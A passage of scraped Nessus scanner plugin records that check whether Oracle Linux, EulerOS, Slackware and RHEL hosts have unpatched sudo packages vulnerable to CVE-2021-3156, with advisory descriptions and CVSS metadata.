Linux 7 : sudo (ELSA-2021-0221)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-0221 advisory.\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via sudoedit\n -s and a command-line argument that ends with a single backslash character: (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-0221.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'sudo-1.8.23-10.el7_9.1', 'cpu':'x86_64', 'release':'7'},\n {'reference':'sudo-devel-1.8.23-10.el7_9.1', 'cpu':'i686', 'release':'7'},\n {'reference':'sudo-devel-1.8.23-10.el7_9.1', 'cpu':'x86_64', 'release':'7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-23T01:08:53", "description": "According to the version of the sudo package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow,\n allowing privilege escalation to root via 'sudoedit -s'\n and a command-line argument that ends with a single\n backslash character.(CVE-2021-3156)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 1, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-22T00:00:00", "title": "EulerOS 2.0 SP2 : sudo (EulerOS-SA-2021-1366)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:sudo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1366.NASL", "href": "https://www.tenable.com/plugins/nessus/146716", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146716);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/22\");\n\n script_cve_id(\n \"CVE-2021-3156\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : sudo (EulerOS-SA-2021-1366)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the sudo package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow,\n allowing privilege escalation to root via 'sudoedit -s'\n and a command-line argument that ends with a single\n backslash character.(CVE-2021-3156)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1366\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4587a5e0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"sudo-1.8.6p7-23.h9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T09:14:11", "description": "New sudo packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : sudo (SSA:2021-026-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:sudo", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2021-026-01.NASL", "href": "https://www.tenable.com/plugins/nessus/145472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2021-026-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145472);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"SSA\", value:\"2021-026-01\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : sudo (SSA:2021-026-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"New sudo packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.461226\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1844bbb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"sudo\", pkgver:\"1.9.5p2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0222 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 7 : sudo (RHSA-2021:0222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:7.7::computenode", "cpe:/o:redhat:rhel_e4s:7.7::server", "cpe:/o:redhat:rhel_tus:7.7::computenode", "cpe:/o:redhat:rhel_eus:7.7::computenode", "cpe:/o:redhat:rhel_tus:7.7", "cpe:/o:redhat:rhel_aus:7.7", "cpe:/o:redhat:rhel_aus:7.7::computenode", "cpe:/o:redhat:rhel_eus:7.7::server", "cpe:/o:redhat:rhel_e4s:7.7", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "cpe:/o:redhat:rhel_eus:7.7", "cpe:/o:redhat:rhel_aus:7.7::server", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_tus:7.7::server"], "id": "REDHAT-RHSA-2021-0222.NASL", "href": "https://www.tenable.com/plugins/nessus/145498", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0222. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145498);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0222\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 7 : sudo (RHSA-2021:0222)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0222 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '7.7')) audit(AUDIT_OS_NOT, 'Red Hat 7.7', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_7_7_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-e4s-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms'\n ],\n 'rhel_eus_7_7_computenode': [\n 'rhel-7-hpc-node-eus-debug-rpms',\n 'rhel-7-hpc-node-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-debug-rpms',\n 'rhel-7-hpc-node-eus-optional-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-rpms',\n 'rhel-7-hpc-node-eus-optional-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-optional-source-rpms',\n 'rhel-7-hpc-node-eus-optional-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-rpms',\n 'rhel-7-hpc-node-eus-rpms__7_DOT_7__x86_64',\n 'rhel-7-hpc-node-eus-source-rpms',\n 'rhel-7-hpc-node-eus-source-rpms__7_DOT_7__x86_64'\n ],\n 'rhel_eus_7_7_server': [\n 'rhel-7-for-system-z-eus-debug-rpms',\n 'rhel-7-for-system-z-eus-debug-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-debug-rpms',\n 'rhel-7-for-system-z-eus-optional-debug-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-rpms',\n 'rhel-7-for-system-z-eus-optional-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-optional-source-rpms',\n 'rhel-7-for-system-z-eus-optional-source-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-rpms',\n 'rhel-7-for-system-z-eus-rpms__7_DOT_7__s390x',\n 'rhel-7-for-system-z-eus-source-rpms',\n 'rhel-7-for-system-z-eus-source-rpms__7_DOT_7__s390x',\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-optional-debug-rpms',\n 'rhel-7-server-e4s-optional-rpms',\n 'rhel-7-server-e4s-optional-source-rpms',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-eus-debug-rpms',\n 'rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-debug-rpms',\n 'rhel-7-server-eus-optional-debug-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-rpms',\n 'rhel-7-server-eus-optional-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-optional-source-rpms',\n 'rhel-7-server-eus-optional-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-rpms',\n 'rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-source-rpms',\n 'rhel-7-server-eus-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-source-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms',\n 